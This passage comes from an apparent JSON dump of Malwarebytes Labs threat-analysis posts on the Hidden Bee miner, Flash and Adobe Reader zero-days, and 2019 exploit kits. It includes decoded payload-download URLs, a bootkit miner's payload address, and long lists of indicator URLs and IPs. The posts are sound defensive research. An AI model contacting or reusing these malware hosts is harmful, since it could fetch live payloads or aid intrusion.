execution:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/dlls_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/dlls_.png> \"\" )\n\nAs you can see, it loads Cabinet.dll that is used for unpacking cabinet files. In later sections, we saw the APIs and strings that are used for the communication over HTTP protocol. We also found references to \"dllhost.exe\" and \"bin/i386/core.sdb\".\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/next_part_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/next_part_.png> \"\" )\n\nIt is easy to guess that this module will be downloading something and running via dllhost.exe.\n\nAnother interesting string is a Base64-encoded content:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/data_part_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/data_part_.png> \"\" )\n\nThe decoded content points to more URLs:\n \n \n http://103.35.72.223/git/wiki.asp?id=530475f52527a9ae1813d529653e9501\n http://103.35.72.223/git/glfw.wasm\n http://103.35.72.223/rt/lsv3i06rrmcu491c3tv82uf228.wasm\n \n\nLooking at the traffic captured by Fiddler, we found that, indeed, those URLs are being queried:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/queried_urls_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/queried_urls_.png> \"\" )\n\nThe requests are coming from dllhost.exe, so that means the above executable was injected there.\n\nThe file _glfw.wasm_ has nothing in common with Web Assembly. It is, in fact, a Cabinet file, containing packed content under the internal path: bin/i386/core.sdb. Looking inside, we found the same custom executable format, starting from DLL names:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/coresdb_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/coresdb_.png> \"\" )\n\nThen, HTTP traffic stops. This was another interesting aspect of this threa,t because the threat actors are perhaps trying to hide the traffic by pretending to use the SLTP protocol to retrieve the actual payload, which can be seen in the strings extracted from the Cabinet file inside of _core.sdb_:\n \n \n INSTALL_SOURCE\n &sid=%u\n INSTALL_SID\n INSTALL_CID\n **sltp://setup.gohub[.]online:1108/setup.bin?id=128**\n ntdll.dll\n ZwQueryInformationProcess\n VolumeNumber\n SCSIDISK\n os=%d&ar=%d\n kernel32.dll\n IsWow64Process\n RtlGetNtVersionNumbers\n %02x\n &sz=\n sltp\n\nThat hostname resolves to 67.198.208[.]110:\n \n \n Pinging setup.gohub.online [67.198.208.110] with 32 bytes of data:\n Reply from 67.198.208.110: bytes=32 time=76ms TTL=51\n\nEncrypted TCP network traffic from our sandboxed machine shows how the binary payload is retrieved:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/encrypted_traffic.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/encrypted_traffic.png> \"\" )\n\nThis whole exploitation and payload retrieval process is rather complex, especially in light of the intended purpose behind this drive-by campaign. Infected hosts are instructed to mine for cryptocurrencies:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/mining_activity.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/mining_activity.png> \"\" )\n\nWhat is unique about this miner is that it achieves persistence by using a bootkit, as described [here](<http://www.cnhongke.org/article/46057>). Infected hosts will have their Master Boot Record altered to start the miner every time the operating system boots.\n\n### A sophisticated attack for a simple payload\n\nThis attack is interesting on many levels for its use of different technologies both in the exploit delivery part as well as how the payload is packaged. According to our telemetry, we believe it is also focused on a select few Asian countries, which makes sense when taking its payload into consideration.\n\nIt also shows that threat actors haven't completely given up on exploit kits, despite a noted downward trend over the last couple of years.\n\n### Protection\n\n[Malwarebytes](<https://www.malwarebytes.com/>) detects both the IE and Flash exploits, resulting in the infection chain being stopped early on.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/07/exploit_block.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2018/07/exploit_block.gif> \"\" )\n\n### Indicators of compromise\n\nInjected dating site\n \n \n 144.202.87[.]106\n\nExploit toolkit\n \n \n 103.35.72[.]223\n\n52he3kf2g2rr6l5s1as2u0198k.wasm\n \n \n 087FD1F1932CDC1949B6BBBD56C7689636DD47043C2F0B6002C9AFB979D0C1DD\n\nglfw.wasm\n \n \n CCD77AC6FE0C49B4F71552274764CCDDCBA9994DF33CC1240174BCAB11B52313\n\nPayload URL and IP\n \n \n setup.gohub[.]online:1108/setup.bin?id=128\n 67.198.208[.]110\n\nMiner Proxy\n \n \n 133.130.101[.]254\n\nThe post ['Hidden Bee' miner delivered via improved drive-by download toolkit](<https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-26T21:00:22", "type": "malwarebytes", "title": "\u2018Hidden Bee\u2019 miner delivered via improved drive-by download toolkit", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-07-26T21:00:22", "id": "MALWAREBYTES:C8D6FFC9442802684305F89A89609938", "href": "https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-06T19:23:57", "description": "For the past couple of years, Office documents have largely replaced [exploit kits](<https://blog.malwarebytes.com/glossary/exploit-kit/>) as the primary malware delivery vector, giving threat actors the choice between social engineering lures and exploits or a combination of both.\n\nWhile today's [malicious spam (](<https://blog.malwarebytes.com/glossary/malspam/>)malspam) heavily relies on macros and popular vulnerabilities (i.e. [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/eula>)), attackers can also resort to [zero-days](<https://blog.malwarebytes.com/glossary/zero-day/>) when trying to compromise a target of interest.\n\nIn separate blog posts, [Gigamon](<https://atr-blog.gigamon.com/2018/12/05/adobe-flash-zero-day-exploited-in-the-wild/>) and [360 Core Security](<http://blogs.360.cn/post/PoisonNeedles_CVE-2018-15982_EN>) reveal how a new zero-day ([CVE-2018-15982](<https://helpx.adobe.com/security/products/flash-player/apsb18-42.html>)) for the Flash Player (version 31.0.0.153 and earlier) was recently used in targeted attacks. Despite being a brand new vulnerability, Malwarebytes users were already protected against it thanks to our Anti-Exploit technology.\n\nThe Flash object is embedded into an Office document disguised as a questionnaire from a Moscow-based clinic.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/12/document-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/12/document-1.png> \"\" )\n\nA dot reveals an embedded (and hidden) ActiveX object\n\nSince Flash usage in web browsers has been declining over the past few years, the preferred scenario is one where a Flash ActiveX control is embedded in an Office file. This is something we saw earlier this year with [CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) against South Korea.\n\n360 Core Security identified the zero-day as a Use After Free vulnerability in a Flash package called _com.adobe.tvsdk.mediacore.metadata_.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/12/swf.png)\n\nActionScript view of the malicious SWF exploit. Thanks David Ledbetter for sharing the dumped file.\n\nVictims open the booby-trapped document from a WinRAR archive that also contains a bogus jpeg file (shellcode) that will be used as part of the exploitation process that eventually loads a backdoor.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/12/rar.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/12/rar.png> \"\" )\n\nExploitation flow showing the processes involved in the attack\n\nAs Qihoo 360 security researchers noted, the timing with this zero-day attack is close to a recent [real-world incident](<https://www.theguardian.com/world/2018/nov/25/russia-border-guards-ram-tugboat-ukraine-navy-crimea>) between Russia and Ukraine. Cyberattacks between the two countries have been going on for years and have affected major infrastructure, such as the [power grid](<https://en.wikipedia.org/wiki/December_2015_Ukraine_power_grid_cyberattack>)\n\nMalwarebytes users were already protected against this zero-day without the need to update any signatures. We detect the malware payload as Trojan.CrisisHT.APT.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/12/CVE-2018-15982.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2018/12/CVE-2018-15982.gif> \"\" )\n\nZero-day attack flow stopped by [Malwarebytes](<https://www.malwarebytes.com/business/endpointprotectionandresponse/>)\n\nAdobe has patched this vulnerability (security bulletin [APSB18-42](<https://helpx.adobe.com/security/products/flash-player/apsb18-42.html>)) and it is highly recommended to apply this patch if you are still using Flash Player. Following the typical exploit-patch cycle, zero-days often become mainstream once other attackers get their hands on the code. For this reason, we can expect to see this exploit integrated into document exploit kits as well as web exploit kits in the near future.\n\nThe post [New Flash Player zero-day used against Russian facility](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-05T22:44:59", "type": "malwarebytes", "title": "New Flash Player zero-day used against Russian facility", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-15982", "CVE-2018-4878"], "modified": "2018-12-05T22:44:59", "id": "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "href": "https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-30T22:45:14", "description": "In the months since our last [spring review](<https://blog.malwarebytes.com/threat-analysis/2019/05/exploit-kits-spring-2019-review/>), there has been some interesting activity from several exploit kits. While the playing field remains essentially the same with Internet Explorer and Flash Player as the most-commonly-exploited pieces of software, it is undeniable that there has been a marked effort from exploit kit authors to add some rather cool tricks to their arsenal.\n\nFor example, several exploit kits are using session-based keys to prevent \"offline\" replays. This mostly affects security researchers who might want to test the exploit kit in the lab under different scenarios. In other words, a saved network capture won't be worth much when it comes to attempting to reenact the drive-by in a controlled environment.\n\nThe same is true for better detection of virtual machines and network tools (something known as [fingerprinting](<https://blog.malwarebytes.com/cybercrime/exploits/2016/08/browser-based-fingerprinting-implications-and-mitigations/>)). Combining these evasion techniques with geofencing and VPN detection makes exploit kit hunting more challenging than in previous quarters.\n\nThreat actors continue to buy traffic from ad networks and use malvertising as their primary delivery method. Leveraging user profiling (their browser type and version, country of origin, etc.) from ad platforms, criminals are able to maintain decent load rates (successful infection per drive-by attempts).\n\n### Summer 2019 overview\n\n * Spelevo EK\n * Fallout EK\n * Magnitude EK\n * RIG EK\n * GrandSoft EK\n * Underminer EK\n * GreenFlash EK\n\n### Vulnerabilties\n\nInternet Explorer\u2019s [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash Player\u2019s [CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>) are the most common vulnerabilities, while the older[ CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) (Flash) is still used by some EKs.\n\n### Spelevo EK\n\nSpelevo EK is the youngest exploit kit, originally [discovered](<https://twitter.com/kafeine/status/1103649040800145409>) in March 2019, but by no means is it behind any of its competitors. \n\n![](https://blog.malwarebytes.com/wp-content/uploads/2019/07/spelevo_.png)\n\nPayloads seen: PsiXBot, IcedID\n\n### Fallout EK\n\nFallout EK is perhaps one of the more interesting exploit kits. [Nao_Sec](<https://twitter.com/nao_sec>) did a thorough [writeup](<https://nao-sec.org/2019/07/steady-evolution-of-fallout-v4.html>) on it recently, showing a number of new features in its version 4 iteration.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2019/07/fallout.png)\n\nPayloads seen: AZORult, Osiris, Maze ransomware\n\n### Magnitude EK\n\nMagnitude EK continues to target South Korea with its own Magniber ransomware in steady malvertising campaigns.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2019/07/magnitude.png)\n\nPayload seen: Magniber ransomware\n\n### RIG EK\n\nRIG EK is still kicking around via various malvertising chains and perhaps offers the most diversity in terms of the malware payloads it serves.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2019/07/RIG.png)\n\nPayloads seen: ERIS, AZORult, Phorpiex, Predator, Amadey, Pitou\n\n### GrandSoft EK\n\nGrandSoft EK remains the weakest exploit kit of the bunch and continues to drop Ramnit in Japan.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2019/07/grandsoft.png)\n\nPayload seen: Ramnit\n\n### Underminer EK\n\nUnderminer EK is a rather complex exploit kit with a [complex payload](<https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/>) which we continue to observe via the same delivery chain.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2019/07/underminer.png)\n\nPayload seen: Hidden Bee\n\n### GreenFlash Sundown EK\n\nThe elusive GreenFlash Sundown EK marked a surprise return via its ShadowGate in a large [malvertising campaign](<https://blog.malwarebytes.com/threat-analysis/2019/06/greenflash-sundown-exploit-kit-expands-via-large-malvertising-campaign/>) in late June.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2019/07/greenflash.png)\n\nPayloads seen: Seon ransomware, Pony, coin miner\n\n### Pseudo-EKs\n\nA few other drive-bys were caught during the past few months, although it might be a stretch to call them exploit kits.\n\n * [azera drive-by](<https://twitter.com/jeromesegura/status/1148289957716344832?s=20>) used the PoC for CVE-2018-15982 (Flash) to drop the ERIS ransomware\n * [Radio EK](<https://nao-sec.org/2019/07/weak-dbd-attack-with-radioek.html>) leveraged CVE-2016-0189 (Internet Explorer) to drop AZORult\n\n### Three years since Angler EK left \n\nJune 2016 is an important date for the web threat landscape, as it marks the [fall of Angler EK](<http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html>), perhaps one of the most successful and sophisticated exploit kits. Since then, exploit kits have never regained their place as the top malware delivery vector. \n\nHowever, since our spring review, we can say there have been some notable events and interesting campaigns. While it's hard to believe that users are still running machines with outdated Internet Explorer and Flash Player versions, this renewed activity proves us wrong.\n\nAlthough we have not mentioned router-based exploit kits in this edition, they are still a valid threat that we expect to grow in the coming months. Also, if exploit kit developers start [branching out of Internet Explorer](<https://www.zdnet.com/article/mozilla-patches-firefox-zero-day-abused-in-the-wild/>) more, we could see far more serious attacks.\n\nMalwarebytes users are protected against the aforementioned drive-by download attacks thanks to our products' anti-exploit layer of technology.\n\n### Indicators of Compromise (URI patterns)\n\n**Spelevo EK**\n \n \n hxxp[://]shark[.]denizprivatne[.]top/barbati-sofia-embed/?id=1fljh8pgb4al2st1r7ui0 \n hxxp[://]shark[.]denizprivatne[.]top/?0186ccfc2affa291487611b&id=1fljh8pgb4al2st1r7ui0 \n hxxp[://]shark[.]denizprivatne[.]top/?8f80b9323f2533ck&id=1fljh8pgb4al2st1r7ui0 \n hxxp[://]shark[.]denizprivatne[.]top/?8f80b9323f2533cbfe19e0483c81dc8b72294a&id=1fljh8pgb4al2st1r7ui0\n\n**Fallout EK**\n \n \n hxxps[://]koreadec[.]com/florulas_8867_11392/brTl/1917-08-03[.]phtml?Patining=eEo \n hxxps[://]koreadec[.]com/4688-garuda/bSkUK/1998_08_17/cokernut-plumages-giglio?misbind=udaler \n hxxps[://]koreadec[.]com/7314/uAFs/sericins/vdJCwq?cjosx=Sturnine-amadous-6883 \n hxxps[://]koreadec[.]com/VfZ/9541_Plucky/apothgm/Purified-Beatifies[.]xhtml?carafe=9109&TIo=nepotious-5579-10022&STlvZ=6372 \n hxxps[://]koreadec[.]com/thereckly_Theatry_lamenter/movant-13555-Procotton/11235/6428-14646-9953?XG53=ethanes-ekename-aldeament&Betwixt=untoggler-6715-anoles&aHvBI=2guk \n hxxps[://]koreadec[.]com/07_11_1981/Bassalian/mUU?aplites=zH1Koq&fBRR=7541_9162_witterly \n hxxps[://]koreadec[.]com/florulas_8867_11392/brTl/1917-08-03[.]phtml?Patining=eEo \n hxxp[://]koreadec[.]com/sSf/Narcotise/tenderer_Tigerfoot_Spackle\n\n**Magnitude EK**\n \n \n hxxp[://]tryfilm[.]site/ \n hxxp[://]cb0p36s1o7v352ddmb[.]outwith[.]space/ \n hxxp[://]e7meue9m8hc243ja5dp8q[.]wroteon[.]club/ \n hxxp[://]wroteon[.]club/10x1b0n236fm0\n\n**RIG EK**\n \n \n hxxp[://]212[.]109[.]198[.]22/?NDE0MzU1&iZdZ&skJLa=known&ljQicPIO=criticized&PbvRlP=detonator&t4gfhtgf4=xfQlKrcFPArhjUODfwIwyIZaUVwb96n8ikbXwRPJgJ_UrxSLNwJEqaKlJLd_mhj2&bmSJmU=vest&IabEYxV=strategy&ffffghds=w3nQMvXcJxfQFYbGMvPDSKNbNknWHViPxomG9MildZeqZGX_k7XDfF-qoVrcCgWR&qRrScLDp=difference&tNEKEWCG=known&qAVUDc=criticized&RWWa=already&NAaUs=difference&tqHbh=referred&XSZz=professional&QqbDBluKn=referred&riObvJqGb=heartfelt&RTXBW=difference&QEcvAFNjYzNTc= \n hxxp[://]212[.]109[.]198[.]22/?NDA5MTgw&BXhmtpFbq&rQLwisIbKvO=constitution&yMpSuTkuRhu=known&EPxLjfEgMobx=perpetual&nxAaNt=strategy&VKoMoenBvZEBoJ=already&t4gfhtgf4=8vUoeLNQPQXihEHRLw1mn4ZUUlpB86umi0aAyUDOgZHU-xTbUQ5G_5qcFoF4nwvF&ffffghds=wXbQMvXcJwDQA4bGMvrESLtMNknQA0KK2Ij2_dqyEoH9fGnihNzUSkr76B2aCm3Z&EuhiAT=strategy&IIwiBsrVTzN=community&LTSPgukgZMu=golfer&WHJVKfgHYyhBKA=already&ruFaROBjfxdFlTw=referred&erHmTrM=community&rZYXaPLBZQZ=constitution&alUaYovES=referred&PAmrMcgpepI=golfer&kWSrADlsss=professional&xftTftqdNDIyNjk0 \n hxxp[://]212[.]109[.]198[.]22/?NjMxNjg5&VhOoAwzH&BQMlhROymiqqMuw=blackmail&GhAssHkhgxqw=community&DegGfd=perpetual&gquWWCtuJtSPU=known&rAGXUesC=perpetual&zLRRtbwijFH=heartfelt&CIklccbXNmonSm=detonator&gaxgBSvwPv=heartfelt&sHkEPhjzv=constitution&EKoVAfMMJrfDqut=community&YDYZAvpVWZjDdO=blackmail&QRRmDFtTZ=blackmail&ffffghds=w3bQMvXcJxfQFYbGMv3DSKNbNkfWHViPxoeG9MildZmqZGX_k7rDfF-qoVvcCgWRxfUlKr&yuImXnAAw=professional&CFnDimnJDGPFi=wrapped&t4gfhtgf4=cFPArhjUODfwIwyIZaUV0b96n8ikbXwRPJgJ_UrxSLNwJEqaKcHbYy0VT8xrkdQJZnxBCy&NrzaCYKBrsfbC=golfer&WYYKaQVuhFBMjM2MDg4\n\n**GrandSoft EK**\n \n \n hxxp[://]pas[.]oxide[.]pimmar[.]fun/chihuahua-posting[.]php \n hxxp[://]pas[.]oxide[.]pimmar[.]fun/getversoinpd/1/2/3/4 \n hxxp[://]pas[.]oxide[.]pimmar[.]fun/9/110546\n\n**Underminer EK**\n \n \n hxxp[://]67[.]198[.]185[.]101/XKIOEEEEE[.]KDJDD[.]php \n hxxp[://]67[.]198[.]185[.]100/1Hqmyt597XO0ZNj9tXit7HZOMroEJu8c[.]php \n hxxp[://]38[.]75[.]137[.]9:9088/index[.]php?ad_id=I27cHv2i8QxDkXOJWhnMGw&re=I27cHv2i8QxDkXOJWhnMGw&rt=I27cHv2i8QxDkXOJWhnMGw&id=9088&zone=I27cHv2i8QxDkXOJWhnMGw&prod=I27cHv2i8QxDkXOJWhnMGw&lp=Type&st=I27cHv2i8QxDkXOJWhnMGw&e=1563981076&y=203384173015 \n hxxp[://]38[.]75[.]137[.]9:9088/js/e1cuqrhmik66gu7pr90qk9v3p8[.]js \n hxxp[://]38[.]75[.]137[.]9:9088/pubs/servlet[.]php?fp=39fe6ccb473b08362ae067b8c0ee865d&lang=en-US&token=&id=49457&sign=5eed006ae06584a03f969b9cd3558c28&validate=13b96b0bb8ac2a105d07f7c8b701f240 \n hxxp[://]38[.]75[.]137[.]9:9088/views/31ftap0qcljocims1ubickgps8[.]html \n hxxp[://]38[.]75[.]137[.]9:9088/logo[.]swf \n hxxp[://]38[.]75[.]137[.]9:9088/static/encrypt[.]min[.]js \n hxxp[://]38[.]75[.]137[.]9:9088/static/tinyjs[.]min[.]js \n hxxp[://]38[.]75[.]137[.]9:9088/js/ftp22vfljscml2370rsritui9g[.]js \n hxxp[://]38[.]75[.]137[.]9:9088/views/dlke6si3fr3spi30btq624ghlg[.]html \n hxxp[://]38[.]75[.]137[.]9:9088/pubs/article[.]php?id=471b68c405614637d03b31b4d3155244 \n hxxp[://]38[.]75[.]137[.]9:9088/views/ul2tuocpr2isi9pperindatp3c[.]ocx[.]gz \n hxxp[://]38[.]75[.]137[.]9:9088/views/m7sg0k3fcvrdre8psojjlu8r2c[.]txt \n hxxp[://]38[.]75[.]137[.]9:9088/views/a9pf63bef3ujd1u7r6v9dda0mk[.]wav \n hxxp[://]38[.]75[.]137[.]9:9088/pubs/wiki[.]php?id=91f093921cbb802ee2d2a22d8a4a1135\n\n**GreenFlash Sundown EK**\n \n \n hxxps[://]fastimage[.]site/act_image[.]html \n hxxps[://]fastimage[.]site/act_image[.]html?mercy=FdMzpfikLihAnNPppGIucrCHLfiIPE0UYY9ocxDP7RzUlUu6%2BcEavY5yGiQn8ogYce3E0sgs06B1y9%2BnxZhQCg%3D%3D&liberty=djji1ghk3gtx&bubble=RUDOpbnkAS1xQHVxflacRzfZxQ%3D%3D \n hxxps[://]fastimage[.]site/uptime[.]js \n hxxp[://]adsfast[.]site/crossdomain[.]xml \n hxxp[://]adsfast[.]site/index[.]php \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/crossdomain[.]xml \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/index[.]php \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/index[.]php \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/index[.]php?58f3d135=AwNt6IfxFIvMI5IVpwl86cW8Vw67HxZLI%2BxIxOVtVcp5LRaaMtmhuElGqOGKWUki92GcJmgL0gwOElyFUkW%2FzdQ1y8Ov8MxNATzL7HlkXp5%2FtFmbrh3TWgiJ1QvTmcEwbx66CaLWd2ekFpng2ky4fKUtGRibaY8Eyjcio3ZyibnhUVlW5CpiWNiz02jHD41t%2F9NDPteWGIO1ysm2%2B4%2Bu9osgKIW1%2BmGxVxMGaRby3g%2FBaqw%3D \n hxxp[://]accomplishedsettings[.]cdn-cloud[.]club/index[.]php?58f3d135=AwNt6IfxFIvMI5IVpwl86cW8Vw67HxZLI%2BxIxOVtVcp5LRaaMtmhuElGqOGKWUki92GcJmgL0gwOElyFUkW%2FzdQ1y8Ov8MxNATzL7HlkXp5%2FtFmbrh3TWgiJ1QvTmcEwbx66CaLWd2ekFpng2ky4fKUtGRibaY8Eyjcio3ZyibnhUVlW5CpiWNiz02jHD41t%2F9NDPteWGIO1ysu3%2Fo%2Bt9IsgKIW1%2BmGxVxMGaRby3g%2FBaqw%3D\n\nThe post [Exploit kits: summer 2019 review](<https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-07-30T16:20:33", "type": "malwarebytes", "title": "Exploit kits: summer 2019 review", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189", "CVE-2018-15982", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2019-07-30T16:20:33", "id": "MALWAREBYTES:CA0A032ADCA72FCB979CB83795FC527B", "href": "https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-05-15T21:13:37", "description": "During the first half of 2018, we have witnessed some particularly interesting zero-day exploits, including one for [Flash](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) ([CVE-2018-4878](<https://nvd.nist.gov/vuln/detail/CVE-2018-4878>)) and more recently for [Internet Explorer](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) ([CVE-2018-8174](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174>)). The former was quickly [used by exploit kits such as Magnitude](<https://blog.malwarebytes.com/threat-analysis/2018/03/hermes-ransomware-distributed-to-south-koreans-via-recent-flash-zero-day/>), while it is only a matter of time before we see the latter being weaponized more widely.\n\nWe can now add to that list an Adobe Reader zero-day ([CVE-2018-4990](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>)), which was [reported by ESET](<https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/>) and Microsoft and has already been patched. Although it has not been observed in the wild yet, it remains a dangerous threat considering it is coupled with a privilege escalation vulnerability in Microsoft Windows.\n\nTo exploit the Windows vulnerability, the attacker must write to an arbitrary address in kernel space, which will not work for Windows 8 and above, as newer security features prevent this kind of mapping. Those two combined zero-days were necessary to escape the Acrobat Reader sandbox protection, which to its credit has been improving the security of the software drastically, so much so that malicious PDFs that were once common as part of drive-by download attacks have all but vanished.\n\nLet's take a quick look at the malicious PDF using [pdf-parser](<https://blog.didierstevens.com/programs/pdf-tools/>):\n \n \n python pdf-parser.py --content CVE-2018-4990.pdf\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/05/obfuscated.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/obfuscated.png> \"\" )\n\nWe can see a suspicious obfuscated blurb that most likely contains the JavaScript code we are looking for. We can decode and dump the output to a raw file:\n \n \n python pdf-parser.py -c CVE-2018-4990.pdf --object 1 --filter --raw > output.raw\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/05/JS.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/JS.png> \"\" )\n\nThe exploit code is now visible in clear text. For a good explanation on how it is used for the ROP chain and shellcode execution, please refer to the [ESET article](<https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/>).\n\nWe tested this zero-day against [Malwarebytes](<https://www.malwarebytes.com/>), which was already stopping it without the need for any additional updates. The mitigation happens at the very beginning of the exploitation chain ([stack pivoting](<http://neilscomputerblog.blogspot.ca/2012/06/stack-pivoting.html>)):\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/05/CVE-2018-4990.gif)](<https://blog.malwarebytes.com/wp-content/uploads/2018/05/CVE-2018-4990.gif> \"\" )\n\nWe recommend users patch their systems to prevent this threat, which will most likely be weaponized in the wild soon. A very plausible attack scenario would be a PDF attachment in a malspam campaign.\n\nThe Adobe security bulletin (CVE-2018-4990) can be found 